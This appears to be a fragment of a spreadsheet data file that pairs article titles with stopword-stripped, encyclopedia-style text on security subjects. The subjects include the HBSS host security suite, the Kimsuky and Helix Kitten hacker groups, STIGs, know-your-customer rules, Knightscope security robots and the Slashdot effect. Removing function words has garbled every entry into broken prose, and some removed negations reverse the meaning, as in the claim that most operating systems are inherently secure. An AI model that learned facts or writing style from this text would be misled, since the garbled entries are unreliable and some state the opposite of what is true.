baseline contained mcafee epolicy orchestrator engine, hips, software compliance profiler (scp), rogue system detection (rsd), asset baseline manager (abm), assets software. releases introduced, software products evolved, products added, cases, completely replaced different products. hbss baseline components january, 2011, hbss currently baseline 4.5, maintenance release (mr2). contains following software: microsoft products optional products/components siprnet-only products/components hbss works heart hbss mcafee epolicy orchestrator (epo) management engine. mcafee tools responsible for: providing consistent front-end point products consolidating point product data analysis presenting point product reports managing point product updates communications ensure application patch compliance mcafee point products mcafee considers point product individual software applications controlled server. hbss point products consist following: host intrusion prevention system (hips) policy auditor (pa) assets baseline module (abm) rogue system detection (rsd) device control module (dcm) asset publishing service (aps) host intrusion prevention system host intrusion prevention system (hips) consists host-based firewall application-level blocking consolidated single product. hips component significant components hbss, provides capability block known intrusion signatures restrict unauthorized services applications running host machines. policy auditor policy auditor (pa) introduced hbss baseline 2.0. policy auditor responsible ensuring compliance mandates payment card industry data security standard (pci dss), sarbanes–oxley 2002 (sox), gramm–leach–bliley 1999 (glba), health insurance portability accountability 1996 (hipaa), federal information security management 2002 (fisma), well best practice frameworks 27001:2005 control objectives information related technology (cobit). maps controls predefined policy content, mcafee policy auditor helps report consistently accurately industry mandates internal policies across infrastructure specific targeted systems. policy auditor agent-based audit solution leverages security content automation protocol (scap) automate processes required internal external audits. assets baseline module assets baseline module, released baseline government off-the-shelf (gots) product, used address system baseline configurations changes order respond information operations condition (infocon) (infocon) changes necessary times heightened security threats system. during initial deployment stages hbss, assets module juvenile lacked much products intended capabilities. however, application fully evolved robust feature packed version capable handling original software's design goals. originally known assets 1.0. upgraded assets hbss baseline 2.0. later called assets 3000 hbss baseline 3.0. rogue system detection rogue system detector (rsd) component hbss used provide real-time detection hosts attaching network. monitors network segments reports hosts seen network server. server determines whether system connected server, mcafee agent installed, identified exception, considered rogue. server take appropriate action(s) concerning rogue host, specified policy. hbss baseline introduced 1.0. updated hbss baseline 2.0. device control module/data loss prevention component hbss introduced hbss baseline specifically address devices networks. jtf-gno 09-xxx, removable flash media device implementation within department defense (dod) networks released march, 2009 allowed removable media, provided meets conditions stated within cto. conditions requires hbss module installed configured manage devices attached system. renamed data loss prevention (dlp) hbss baseline mr3. assets publishing service assets publishing service (aps) hbss introduced hbss baseline allow enclaves report asset information third-party entity standards-compliant format. adds contextual information hbss assets allows improved reporting features systems relying hbss data. obtaining hbss according jtf-gno 07-12, agencies required deploy hbss networks. disa made hbss software available download protected patch server. users attempting download software required common access card (cac) .mil network. disa provides software updates free charge entities. additionally, hbss administrators require satisfactory completion hbss training commonly appointed unit section commander writing. learning hbss order receive administer hbss system, system administrators must satisfactorily complete online class hbss training well identified hbss administrator. online training takes hours complete class training requires four days, excluding travel. advanced hbss class also available hbss administrators wishing acquire in-depth knowledge system. hbss online class training managed disa. hbss support disa risk management executive office (re) formerly field security office (fso) provides free technical support hbss administrators help desk. disa three tiers support, tier tier iii. tier tier support provided disa fso, tier support provided mcafee. disa support available using following methods: future hbss current pace, hbss updated several times original baseline current baseline 3.0, version. within baseline 3.0, maintenance releases introduced every four months, bringing better stability security release. hbss follows mcafee version updates closely expected continue trend continuously developed. references external links end-point security spreads throughout military northrop grumman wins force siprnet contract information assurance support environment mcafee, inc. systems</t>
  </si>
  <si>
    <t>Kimsuky</t>
  </si>
  <si>
    <t>kimsuky (also known velvet chollima black banshee) north korean state backed hacker group targets south korean think tanks, industry, nuclear power operators, south korean ministry unification espionage purposes. recent years kimsuky expanded operations include states russia, united states, european nations. history according u.s. cybersecurity infrastructure security agency kimsuky likely active since 2012.in march 2015 reported south korea claimed kimsuky stole data korea hydro nuclear power.in august 2019 reported kimsuky targeting retired south korean diplomats, government, military officials, attack called "the first kind."in september 2020 reported kimsuky attempted hack officials united nations security council.a lawmaker people power party reported that, 2021, kimsuky detected within internal networks korea atomic energy research institute. also lazarus group ricochet chollima references</t>
  </si>
  <si>
    <t>Single-loss expectancy</t>
  </si>
  <si>
    <t>single-loss expectancy (sle) monetary value expected occurrence risk asset. related risk management risk assessment. single-loss expectancy mathematically expressed where exposure factor represented impact risk asset, percentage asset lost. example, asset value reduced thirds, exposure factor value 0.66. asset completely lost, exposure factor result monetary value unit single-loss expectancy expressed (euros, dollars, yens, etc.): exposure factor subjective, potential percentage loss specific asset specific threat realized. exposure factor subjective value person assessing risk must define. also information assurance risk assessment annualized loss expectancy references external links information security risk analysis paper digital threat</t>
  </si>
  <si>
    <t>Sixgill</t>
  </si>
  <si>
    <t>sixgill israeli cyber intelligence company analyses monitors deep dark threat intelligence. company founded 2014 headquartered aviv, israel. history sixgill founded aviv, israel 2014, kasztan elad lavi. idea sixgill initially developed kasztan. soon company established, joined citibank accelerator program.the sixgill platform uses proprietary algorithms technology create profiles patterns dark users hidden social networks. identifies tracks potential cyber criminals prevent malicious activity hacking data breaches. customers sixgill include; global 2000 enterprises, financial services, managed security service providers (mssps), government enforcement agencies.in 2017, sixgill responsible tracking isis cyber activity relation threats made towards prince george british royal family. 2019, sixgill agents uncovered money laundering activities undertaken cyber criminals fortnite battle royale online game russian, chinese, arabic, english spanish languages. investments 2014, sixgill received initial funding million terra labs. 2016, company raised additional series round $4.3 million composed $800,000 terra labs $3.5 million elron electronic industries. awards recognition 2019 cool vendor security operations threat intelligence, gartner inc. references external links official website</t>
  </si>
  <si>
    <t>Security Vision</t>
  </si>
  <si>
    <t>security vision software meant automation information security management system (isms) organisation. software kind representative security operations center (soc). functionality functionality security vision renders information security processes comprising information security management system organization automatic compliance international information security management standards iso/iec 27001:2013. next security vision modules allow make automatic performance standard requirements following sections: information assets management; information security regulatory documents management; information security entries logs management; information security standards compliance management; information security risk management; computer security incident management; knowledge management; corporate system interaction management; corporate information security awareness management; monitoring audit management; vulnerability management; change management field; business continuity management; data storage device management; limit management security object; physical security management; backup management; mobile client management; cloud information security system management; data visualization information security status alert management; information security status reports management. architecture from moment creation security vision software till creator system sticks three-level architecture core level, collection level management level. core level made collection, analysis correlation events generated different sources events corporate network. collection level meant for: collection, standardization dispatch core level events coming home information security systems; inspection control hardware means integrity, system application software located servers workstations.management level made rendering information security management process automatic basically russian-speaking system management portal. supported systems security vision software collects events generated process following information security information technology functioning: information security systems: firewall; intrusion detection/prevention system; cryptographic information security system; unauthorized access security system; anti-virus security system; data loss/leak prevention system; content-control system proxy server; anti-spam system; virtual infrastructure security system; database security system; access control system; other ip-oriented systems; network equipment routers, switches, etc.; technical security systems: information leakage technical channels security system; guard alarm system; fire alarm system; closed-circuit television system; access control system; warning system; security alarm system; area surveillance system; security lighting system; security smoke alarm system; emergency power system; heating, ventilation, conditioning system; other ip-oriented systems; information technology systems: customer relationship management system; enterprise content management system; enterprise resource planning system; human resources management system; enterprise asset management system; business process management system; information lifecycle management system; service desk system; corporate e-mail server (message transfer agent); database management system; workstation management system; server; other ip-oriented systems; industrial control system: building management system; infrastructure engineering management; traffic management; power tracking management; corporate energy management, power management center; central dispatcher unit, situational center energy efficiency; operation systems server workstation regulatory requirements regulatory requirements associated necessity system kind found mandatory legislation norms russian federation well recommended international prescriptions economic sectors area. regulatory security requirements: personally identifiable information; confidential information; classified information; systems information.industry standards for: energy industry; finance sector; public sector; certificate authority.international standards for: information security management; quality management; information security risk management; service management; business continuity planning; occupational safety health management; sustainable development management; system integration management; management, audit information security. certification software core level, comprises functionality stocktaking integrity control, certified means level control absence non-declared capabilities, listed national catalog certified information security means federal office technical export control, also used: automatic systems class included («management document. automated systems. unauthorized access security. automated systems classification information security requirements»); information systems security class included (decree federal office technical export control dated 11.02.2013 «mandatory regulations information security, classified information, held within national information systems»); personally identifiable information systems maintenance security level included (decree federal office technical export control dated 18.02.2013 «list contents organizational technical means provide information security personally identifiable information personally identifiable information systems»). system requirements awards 2013: infobez award 2013. nomination «e=mc2 creation powerful applications technology».2012: infobez award 2012. nomination «meteor speed reaction, quick right solutions»; solution russia monitoring enterprise security management (based analysis results expert magazine); professional award area information security «silver dagger». diploma medal nomination «realized projects information security».2011: competition «product year 2011» category «information security» based magazine votes; infosecurity russia 2011. «award 2011.itsec.award»; national field award consolidation security russia «zubr». diploma gold medal.2010: innovation competition cisco, nomination «best solution «network without limits». prize-winning place. press «how automate measurement information security scale enterprise»; protected personally identifiable information «rostelekom j.s.c.» irkutsk subscribers»; «virtual systems: security illusion pointless fear?»; «managed security»; «creation automatic information security management system»; «the enterprise»; «how automate information security management»; «security vision: security»; «security vision information security management monitoring»; «new version security vision information security»; «security vision co»; presents version complex information security system security vision»; «centers operation information security management»; «information security: surfing… know?». references external links official website security vision</t>
  </si>
  <si>
    <t>Security Technical Implementation Guide</t>
  </si>
  <si>
    <t>security technical implementation guide (stig) configuration standard consisting cybersecurity requirements specific product. stigs enables methodology securing protocols within networks, servers, computers, logical designs enhance overall security. these guides, implemented, enhance security software, hardware, physical logical architectures reduce vulnerabilities. examples stigs would benefit configuration desktop computer enterprise server. most operating systems inherently secure, leaves open criminals identity thieves computer hackers. stig describes minimize network-based attacks prevent system access attacker interfacing system, either physically machine network. stigs also describe maintenance processes software updates vulnerability patching. advanced stigs might cover design corporate network, covering configurations routers, databases, firewalls, domain name servers switches. also information assurance triad security content automation protocol references external links resources nist security configuration checklists repository security technical implementation guides supporting documents public area online stig search</t>
  </si>
  <si>
    <t>Helium Network</t>
  </si>
  <si>
    <t>helium network decentralized wireless internet things (iot) network using lorawan system, tied cryptocurrency helium network token (symbol hnt). nodes network generally owned placed individuals homes offices, rewarded participation network payments hnt. network aims provide connectivity sensor devices areas wireless mobile coverage minimal, requires much power. history helium network begun helium, inc. 2013 network lora gateway hotspots could deployed throughout area agreements building owners, typically paid conventional currency. 2017, company's funds running low, switched strategy: offering individuals payment cryptocurrency operate individually owned nodes homes offices. these individually owned nodes purchased costs $500 each, payments owners vary based data usage $.10 month. hotspot operators would also vote operation network. 2022, helium inc. rebranded nova labs inc. raised $200 million funding round tiger global management andreessen horowitz.reports july 2022 revealed helium falsely claimed lime salesforce major customers years, despite neither company formal relationship helium using network. helium network token helium network token cryptocurrency distributed operators helium hotspots, validators, nodes helium network. because much lower power requirements devices compared required proof-of-work based mining, described environmentally responsible cryptocurrency. references external links official website</t>
  </si>
  <si>
    <t>Helix Kitten</t>
  </si>
  <si>
    <t>helix (also known apt34 fireeye, oilrig) hacker group identified crowdstrike iranian. history group reportedly active since least 2014. targeted many organizations advanced persistent threat according john hultquist.in april 2019, apt34's cyber-espionage tools' source code leaked telegram. targets group reportedly targeted organizations financial, energy, telecommunications, chemical industries, well critical infrastructure systems. techniques apt34 reportedly uses microsoft excel macros, powershell-based exploits social engineering gain access targets. references</t>
  </si>
  <si>
    <t>HemoSpat</t>
  </si>
  <si>
    <t>hemospat bloodstain pattern analysis software created forident software 2006. using photos bloodshed incident crime scene, bloodstain pattern analyst hemospat calculate area-of-origin impact patterns. this information useful determining position posture suspects victims, sequencing events, corroborating refuting testimony, crime scene reconstruction. results analyses viewed within software top-down, side, front views, exported several formats integration point cloud modelling software. formats hemospat exports include: autocad collada vrml wavefront objhemospat capable calculating impact pattern origins part pattern available, well impacts non-orthogonal surfaces. hemospat also used research kind information captured cast-off patterns, methods scene documentation, improving area-of-origin calculations. references external links hemospat official site</t>
  </si>
  <si>
    <t>Known error</t>
  </si>
  <si>
    <t>known error software fixed, known root cause either little disruptive impact user known work around.tested systems often described "free known errors" recognition complex systems cannot proven error free.in operations known errors logged system's known error database (kedb) used prioritize changes develop customer support reference information work around exists. itil framework kedb part problem management process. also fatal system error references</t>
  </si>
  <si>
    <t>Knowledge-based authentication</t>
  </si>
  <si>
    <t>knowledge-based authentication, commonly referred kba, method authentication seeks prove identity someone accessing service financial institution website. name suggests, requires knowledge private information individual prove person providing identity information owner identity. there types kba: static kba, based pre-agreed shared secrets, dynamic kba, based questions generated wider base personal information. static (shared secrets) static kba, also referred "shared secrets" "shared secret questions," commonly used banks, financial services companies e-mail providers prove identity customer allowing account access fall-back, user forgets password. point initial contact customer, business using static must collect information shared provider customer—most commonly questions corresponding answers. this data must stored retrieved customer comes back access account. weakness static demonstrated incident 2008 unauthorized access gained e-mail account former alaska governor sarah palin. yahoo! account's password could reset using shared secret questions including "where meet spouse?" along date birth code former governor answers easily available online. some identity verification providers recently introduced secret sounds pictures effort help secure sites information. these tactics require methods data storage retrieval secret questions. dynamic dynamic high level authentication uses knowledge questions verify individual identity require person provided questions answers beforehand. questions compiled public private data marketing data, credit reports transaction history. initiate process, basic identification factors name, address date birth must provided consumer checked identity verification service. after identity verified, questions generated real time data records corresponding individual identity provided. typically, knowledge needed answer questions available person's wallet (some companies call "out-of-wallet questions") making difficult anyone actual identity owner know answer obtain access secured information. generally, length time number attempts provided respond limited prevent answers researched. dynamic employed several different industries verify identities customers means fraud prevention compliance adherence. because type based existing relationship consumer, gives businesses higher identity assurance customer identity account origination. also cognitive password identity verification service wallet references</t>
  </si>
  <si>
    <t>Know your customer</t>
  </si>
  <si>
    <t>know customer know client (kyc) guidelines financial services require professionals make effort verify identity, suitability, risks involved maintaining business relationship. procedures within broader scope bank's anti-money laundering (aml) policy. processes also employed companies sizes purpose ensuring proposed customers, agents, consultants, distributors anti-bribery compliant, actually claim banks, insurers, export creditors, financial institutions increasingly demanding customers provide detailed diligence information. initially, regulations imposed financial institutions non-financial industry, fintech, virtual assets dealers, even non-profit organizations liable oblige. standards objective guidelines prevent businesses used criminal elements money laundering. related procedures also enable businesses better understand customers financial dealings. this helps manage risks well-judged manner. today, principles apply banks well different online businesses. they usually frame policies incorporating following four elements: customer acceptance policy; customer identification procedures; monitoring transactions; risk management. stringent regulatory environment establishes mandatory crucial procedure financial institutions well non-financial institutions. minimizes risk fraud, identifying suspicious elements earlier client-business relationship. purposes policy, customer/user defined as:a person entity maintains account business relationship reporting entity; whose behalf account maintained (i.e. beneficial owner); beneficiaries transactions conducted professional intermediaries stockbrokers, chartered accountants, solicitors, permitted law; person entity connected financial transaction pose significant reputational risks bank, example, wire transfer issue high-value demand draft single transaction. laws country australia: australian transaction reports analysis centre (austrac), established 1989, monitors financial transactions australia sets client identification requirements. canada: financial transactions reports analysis centre canada (fintrac), established 2000, canada's financial intelligence unit. updated regulations june 2016 regarding acceptable methods determine identity individual clients ensure compliance regulations. pending lawsuit active canada challenging constitutionality legislation. india: reserve bank india introduced guidelines banks 2002. italy: banca d'italia exercises regulation power financial industry, 2007 requirements financial institutions operate italian territory. japan: identification customers financial institutions 2003 south korea: reporting certain financial transaction information regulates diligence country. luxembourg: governed anti-money laundering (aml) laws regulations, became effective 1993 amended last time 2015. mexico: "federal prevention identification operations resources illicit origin", promulgated 2012 president felipe calderon's administration came force 2013 president enrique peña nieto administration.{ley federal para prevención identificación operaciones recursos procedencia ilícita namibia: financial intelligence act, 2012 (act 2012) published government notice gazette 5096 december 2012. zealand: updated laws enacted late 2009 entered force 2010. mandatory registered banks financial institutions (the latter extremely wide meaning). singapore: various industries singapore subject aml/cft requirements, including requirements promulgated monetary authority singapore applicable financial institutions. south africa: financial intelligence centre 2001 (fica) united kingdom: money laundering regulations 2017 underlying rules govern many businesses guidance provided european joint money laundering steering group along financial conduct authority's 'financial crime: guide firms' compliance. united states: pursuant patriot 2001, secretary treasury required finalize regulations october 2002 making mandatory banks. related processes required conform customer identification program (cip). kycc kycc know your customer's customer process identifies customer's customer activities nature. this includes identification people, assessing associated risk levels associated activities customer's customer (business) involved in.kycc derivative standard process, necessitated growing risk fraud originating fraudulent individuals companies, might otherwise hiding second-tier business relationships. i.e. customer's customer). know your business simply extension laws implemented reduce money laundering. practices verify business. includes verification registration credentials, location, ubos (ultimate beneficial owners) business, etc. also, business screened blacklists grey lists check involved sort criminal activity money laundering, terrorist financing, corruption, etc. significant identifying fake business entities shell companies. crucial efficient compliance. ekyc electronic know customer (ekyc) involves internet digital means identity verification. criticism criticisms policy include: know customer places costly burden businesses operating financial industry, especially smaller financial companies compliance costs disproportionately heavy. customers feel information requested intrusive burdensome choose enter business relationship result. innocent, law-abiding individuals digital nomads likely disproportionately disadvantaged living nomadic life makes increasingly difficult even impossible hold formal banking relationship anywhere world lack proof address, bills, and/or debt documentation required kyc. retired people travel within country without permanent fixed address also disproportionately disadvantaged reason. jurisdictions across americas, europe, middle east africa (emea), asia pacific indicated jurisdictions permit form reliance customer information provided third parties. many instances data incorrect, potential bank customers unaware error grievance procedure correct sanction data provider. some citizens countries (canada) fighting back over-reach sovereign banking system challenged courts. intelligence division treasury department repeatedly systematically violated domestic surveillance laws snooping private financial records citizens companies, according government sources. also financial action task force money laundering anti-money laundering anti-money laundering software anti-bribery anti-corruption politically exposed person certified copy references</t>
  </si>
  <si>
    <t>Knightscope</t>
  </si>
  <si>
    <t>knightscope, inc. (also known knightscope) american security camera robotics company headquartered mountain view, california. knightscope designs, builds deploys robots called autonomous data robots (adrs) monitoring people malls, parking lots, neighborhoods public areas. knightscope robots fully autonomous using self-driving technology designed alert police security incidents sensors detect weapons, read license plates detect suspicious activities. knightscope founded 2013, founders stated motivated create autonomous security robots following sandy hook school shooting 2012. knightscope shipped first robot 2015. company four models robots, designed indoor, outdoor, terrain uses, well model stationary use. after several years operation several rounds fundraising, primarily equity crowdfunding, company became public launched initial public offering (ipo) january 2022. knightscope well known maker fully autonomous security robots. users knightscope robots generally reported lower crime rates areas robots deployed, attributed mostly physical deterrence robot's presence. knightscope autonomous robots raised concerns critics privacy displacement. history knightscope co-founded 2013 william santana stacy stephens. previously executive ford, stacy stephens former police officer dallas, texas. founders stated decided create security robots sandy hook shooting 2012.knightscope says hope adrs help security enforcement personnel detect trouble preventing minimizing public injuries fatalities. knightscope robots first shipped 2015.in 2017, knightscope raised million indicated seeking partnership allied universal. 2017, companies confirmed clients knightscope include microsoft, uber, juniper networks, sacramento kings, laguardia airport universal. march 2021, knightscope second place "power passengers challenge" security contest hosted nasa tsa, winning $20,000 grant. 2021, knightscope announced raised additional $21.91 million startengine, private equity crowdfunding company.in december 2021, company filed paperwork initial public offering. knightscope listed nasdaq ticker symbol "kscp" january 2022. unique offering offered pre-ipo equity crowdfunding retail investors first, rather large investment firms typically done pre-ipos. knightscope notable among public companies fact significant portion seed funding came equity crowdfunding, rather venture capital. models knightscope four different robot models: clients charged hourly rate machine price designed compete minimum wage various states. besides autonomous, robot features include ability read license plates, thermal scans, detect hidden weapons, identify faces wanted people. model bullet-shaped robot stands feet tall. twin panels lights two-thirds body. there also small silver-colored flag united states left side body. patrols charges autonomously detects crime using variety sensors including video camera, thermal imaging sensors, laser range finder, radar, quality sensors, detector suspicious wireless signals.during autonomous patrol, detects abnormal noise temperature change, known criminals, alert guards. software package user respond alerts called knightscope security operations center. mobility moves miles hour. uses mapping software create geo-fenced perimeter makes stay within area. creates point cloud show image surroundings geo-fenced area. also uses ultrasonic sensor detect objects surroundings movements wheels. 2016, year release knightscope announced robot focus indoor environments. follow-up models launched 2018. stationary scanner designed entrances exits buildings detect weapons crowd. security today product year award. larger all-terrain unit four wheels. reception results knightscope autonomous machines designed supplement human security teams alerting suspicious activity, rather directly intervening. clients used knightscope robots generally reported lower crime rates areas robots patrolled, primarily deterrence rather increased arrests. vegas police department reported apartment complex high crime rate leased knightscope robot significant drop calls robot deployed. vegas police official stated unsure attributed directly robot. apartment manager, however, stated robot directly deter crime, assisting solving vandalism reports. security official pechanga resort casino, also deployed knightscope robots, stated unsure robots reduced crime casino, useful identifying people casino blacklisted, footage robots provided prevented civil lawsuit casino. animal shelter rented knightscope robot month reported lower rates vandalism fewer break-ins deployment. interviewees city huntington park, deployed knightscope robot public park, reported greater sense security among public, mild increase tourism public interest robot area robot deployed, addition lower crime rates. police officials city huntington park noted drop crime increase arrests area knightscope robot deployed, directly attributed robot's presence.vanderbilt university professor christopher slobogin described knightscope robots "panvasive" noticeable traditional security cameras thus perceived intrusive. cornell university computer science professor ross knepper argues mysterious nature knightscope robots adds value physical deterrent crime, arguing potential offenders unsure robots' features capabilities thus refrain committing crimes vicinity. displacement concerns although designed work tandem security personnel, knightscope units raised concerns displacement private security guards. knightscope robots slightly expensive typical unarmed security guard annual basis, operate hours single charge, taking three 8-hour shifts, thus costing fraction price round clock security guards. privacy possibility used public places concerns privacy. take pictures videos people without notification. also monitor conversations social media feeds. some trust k5's ability recognize actual suspects. jeramie scott, national security fellow electronic privacy information center (epic) said, “automated surveillance, facial recognition license plate recognition public makes suspects.” center's president, marc rotenberg stated “once enter public space collect images sound recordings, entered another realm. this kind pervasive surveillance people edge.” rotenberg also stated similar privacy concerns cctv google mapping cars. response concerns privacy, knightscope william stated crime generally bigger concern people privacy, stating "i'll tell puts people edge, getting shot at." incidents july 2016, knightscope deployed stanford shopping center palo alto, collided 16-month-old toddler, bruising child's running child's foot. stanford shopping center responded docking units, suspending activity robots incident could investigated. knightscope responded, calling incident "accident", issued formal apology family child. april 2017, 41-year-old mountain view arrested connection alleged parking-lot altercation also stanford shopping center. allegedly drunk attacked robot, arrested police footage security robot showing chain events.in july 2017, knightscope washington harbour development washington d.c. slipped loose brick surface fell water fountain. knightscope officials stated error self-driving algorithm planned fix.in december 2017, francisco spca rented knightscope robot patrol area next animal shelter, including public sidewalk homeless people encamped. spokesperson spca stated robot effective significantly reducing vandalism petty crime area; however, amid accusations spca using robot deter nearby homeless encampments, spca discontinued contract. spca spokesperson denied purpose robot deter homeless encampments, stated robot's presence did, however, reduce presence homeless encampments area.in october 2019 woman attempted report fight huntington park, california park using k5's emergency alert button, reportedly tell woman "step way." huntington park chief police stated alert features hooked police department time, feature still development. references external links media related knightscope wikimedia commons official website business data knightscope, inc.:</t>
  </si>
  <si>
    <t>Knight Security Systems</t>
  </si>
  <si>
    <t>knight security systems, llc, physical security solutions integrator, headquartered austin, texas offices lubbock, dallas, houston, antonio, corpus christi, mcallen. president phil lake. company knight security systems founded 1983. company's security solutions include access control, video surveillance, intrusion well fire detection systems.in 2009, knight security made headlines securing largest single, public sector contract texas $12.5 million texas department aging disability services (dads) install 3,200 high-definition video surveillance camera systems buildings state school campuses.in 2015, knight awarded contract texas lottery $100,000. compliance knight staff hold industry certifications texas department public safety's private security bureau license, state texas txmas, state texas dir. also list companies based austin, texas references external links company website knight security deploys 3,000-camera network knight security systems awarded video surveillance contract texas department aging disability services product trademark</t>
  </si>
  <si>
    <t>Knight Foundation</t>
  </si>
  <si>
    <t>john james knight foundation, also known knight foundation, american non-profit foundation provides grants journalism, communities, arts. organization founded knight memorial education fund 1940. first decade, contributions came akron beacon journal miami herald. incorporated knight foundation 1950 ohio, reincorporated john james knight foundation florida 1993. first grant area journalism inter american press association, press advocacy group, miami. after creed black assumed presidency foundation 1988, national presence grew. 1990 board trustees voted relocate foundation's headquarters akron, ohio, miami, florida. history from 1907 1933, charles landon knight published akron beacon journal. practices provide tuition assistance college students need. following father's death, john james knight created knight memorial education fund 1940 continue mission helping needy akron college students college. akron beacon journal also contributed money education fund. december 1950, knight foundation created beginning balance $9,047 transferred education fund. knight foundation incorporated state ohio goal carrying work education fund. start, foundation funded education, social services, cultural organizations journalism-related causes. first decade, foundation's money came contributions akron beacon journal miami herald, well personal gifts john james knight. other knight newspapers also contributed early 1960s; limited number grants cities. despite several family ties, foundation legally independent knight-owned newspapers. newspaper contributions foundation stopped five years later. time, knights' mother clara, died november 1965, left inheritance 180,000 shares knight stock foundation. stock valued $5.2 million. years later, 1974, knight newspapers merged ridder publications create knight-ridder inc., time largest newspaper company country. hills, former president knight newspapers, became knight-ridder chairman ceo. hills, foundation trustee since 1960, first person outside family head knight newspapers. april 1975, john knight signed final will, leaving bulk knight-ridder shares knight foundation. foundation opened first office akron full-time employees: president maidenburg, former akron beacon journal executive editor secretary, shirley follo. more year taking reins, maidenburg fell ill. foundation's headquarters moved akron miami 1990. time, foundation's portfolio valued $522 million staff grown employees. february 1991, james knight died, leaving bulk estate, $200 million, foundation. hills succeeded chairman board. with foundation besieged requests early 1990s emergency funding "save symphony," penelope mcphee, director arts program, designed magic music initiative.in 1992, knight launched five-year initiative $5.4 million grants build connection orchestras audiences. 1999, foundation approved second phase, expanding program total million years. knight-ridder newspapers foundation held ties u.s. cities 1998, foundation's board trustees voted permanently fund cities, independent knight-ridder bought sold newspaper business future. across cities, foundation deployed program directors oversee funding initiatives. each city knight community advisory committee, group made local residents, offer funding suggestions city. 2005, address internet's increasingly disruptive impact traditional media industry, knight began number systemic changes approach making grants. first actions ceo, alberto ibargüen suspended creation endowments journalism programs colleges universities. premise traditional journalism education change meet unique challenges digital age. knight also began experimenting non-traditional approaches connecting grantees, contests limited grantees words describe ideas open anybody. first contests, knight news challenge, sought ideas used "digital technology inform communities." addition knight's pivot toward funding digital innovations, foundation also doubled support first amendment, funding regular surveys gauged high school students' awareness helping create organizations like knight first amendment institute columbia university "preserve expand first amendment rights digital research education, supporting litigation favor protecting freedom expression press." under ibargüen, knight also expanded support arts, "knight arts challenges" number knight communities. programs foundation's website describes grant-making programs journalism, communities, arts. communities knight-ridder newspapers 1991, time last founder james knight's death, considered among "knight communities" eligible funding foundation's community arts programs. communities knight works communities united states. eight communities, local program director leads work: another communities 'knight donor advised funds' guided knight foundation local community foundations. communities, local community foundation first point contact funding: education training foundation endows knight chairs journalists tenured positions universities across united states. journalism-technology labs various universities also funded knight foundation.knight foundation funds multimedia training newsrooms national public radio programs like knight-mozilla opennews. leadership knight foundation presidents been: john knight, james knight, hills, creed black, hodding carter (1997–2005) alberto ibargüen (2005–present). grants individual u.s.-based organization apply grant. (before 2010, organization registered section 501(c)(3) non-profit organization.) process asking grant begins letter inquiry describing project concept. addition foundation's regular granting program, three contests (calls entries): knight news challenge, knight arts challenge knight community information challenge. 2011 foundation added fourth contest, black male engagement challenge. 2015 grant agreement reached wikimedia foundation build search engine called knowledge engine. assets grant making source: john james knight foundation annual reports dedications john james knight theatre performance venue, part levine center arts charlotte, north carolina john james knight concert hall performance venue, part adrienne arsht center performing arts miami, florida references external links official website musibay, oscar pedro (2012-01-04). "knight foundation grant could mean $30m miami science museum". south florida business journal. bizjournals. retrieved 2015-11-11.</t>
  </si>
  <si>
    <t>Hi-Tech Crime Enquiry Cell</t>
  </si>
  <si>
    <t>hi-tech crime enquiry cell special unit kerala police kerala, india, began operations 2006. formed prevent, detect defend serious organized high technology crimes. unit organized purpose prevent, investigate, prosecute computer related crimes working government agencies, private sector, academic institutions, foreign counterparts. references external links hi-tech crime enquiry cell</t>
  </si>
  <si>
    <t>Higgins project</t>
  </si>
  <si>
    <t>higgins open-source project dedicated giving individuals control personal identity, profile social network data. project organized three main areas: active clients active client integrates browser runs computer mobile device. higgins 1.x: active client supports oasis protocol performs functions information card selector. higgins 2.0: plan move beyond selector functionality support managing passwords higgins relationship cards, well protocols openid. also becomes client personal data store (see below) thereby provides kind dashboard personal information place manage "permissioning"—deciding gets access slice user's data. personal data store (pds) work area development higgins 2.0. stores local personal data, controls access remotely hosted personal data, synchronizes personal data devices computers, accessed directly client allows user share selected aspects information people organizations trust. identity services code saml compatible identity provider (ii) enabling websites openid compatible. history initial code higgins project written paul trevithick summer 2003. 2004 effort became part socialphysics.org, collaboration paul mary ruddy, azigo, (formerly parity communications, inc.), meristic, john clippinger, berkman center internet society. higgins, original name eclipse trust framework, accepted eclipse foundation early 2005. mary paul project co-leads. novell's participation project announced early 2006. higgins received technology contributions ibm, novell, oracle, serena, google, eperi gmbh well several firms individuals. version released february 2008.as 2019 eclipse higgins archived, meaning inactive project. also windows cardspace (formerly code-named infocard) i-card information card references</t>
  </si>
  <si>
    <t>High Assurance Guard</t>
  </si>
  <si>
    <t>high assurance guard (hag) multilevel security computer device used communicate different security domains, niprnet siprnet. example controlled interface security levels. hags approved common criteria process. operation runs multiple virtual machines physical machines subsystems lower classification, more) subsystems higher classification. hardware runs type knowledge management software examines data coming higher classification subsystem rejects data classified higher lower classification. general, allows lower classified data resides higher classified system moved another lower classified system. example, would allow unclassified information residing secret classified system moved another unclassified system. through various rules filters, ensures data lower classification allows transfer. application layer, runs "evaluated mandatory integrity policy" provides sensitive files, data applications protection inadvertent disclosure. operating system level, must multilevel kernel ensures sensitive information, processes, devices stored running system different sensitivity levels cannot intermingle violation system's mandatory security model. systems certified common criteria; depending classification, system require common criteria evaluated assurance level (eal) higher. examples, evaluation (eal augmented) higher required export secret domain unclassified domain. some manufacturers "trusted computer system" "trusted applications high assurance" equivalent term hag. importance, risks mostly used email environments certain organizations unclassified network access, need send message organization secret network access. provides ability. also data diode guard (information security) cross-domain solution</t>
  </si>
  <si>
    <t>Slashdot effect</t>
  </si>
  <si>
    <t>slashdot effect, also known slashdotting, occurs popular website links smaller website, causing massive increase traffic. this overloads smaller site, causing slow even temporarily become unavailable. this effect denial-of-service attack, albeit accidentally. name stems huge influx traffic would result technology news site slashdot linking websites. original circumstances changed, flash crowds slashdot reported 2005 diminishing competition similar sites, general adoption elastically scalable cloud hosting platforms. effect associated websites metablogs fark, digg, drudge report, imgur, reddit, twitter, leading terms farked drudged, reddit effect, receiving death site question. google doodles, link search results doodle topic, also result high increases traffic search results page. typically, less robust sites unable cope huge increase traffic become unavailable common causes lack sufficient data bandwidth, servers fail cope high number requests, traffic quotas. sites maintained shared hosting services often fail confronted slashdot effect. flash crowd generic term without using specific name describes network phenomenon network host suddenly receives much traffic. this sometimes appearance website blog news column. terminology according jargon file, term "slashdot effect" refers phenomenon website becoming virtually unreachable many people hitting site mentioned interesting article popular slashdot news service. later extended describe similar effect listed popular site, similar generic term, flash crowd, appropriate term.the term "flash crowd" coined 1973 larry niven science fiction short story, flash crowd. predicted consequence inexpensive teleportation would huge crowds materializing almost instantly sites interesting news stories. twenty years later, term became commonly used internet describe exponential spikes website server usage passes certain threshold popular interest. this effect anticipated years earlier 1956 alfred bester's novel stars destination.the reddit effect also used describe viral crowd fundraising efforts addition surge traffic. cause sites slashdot, digg, 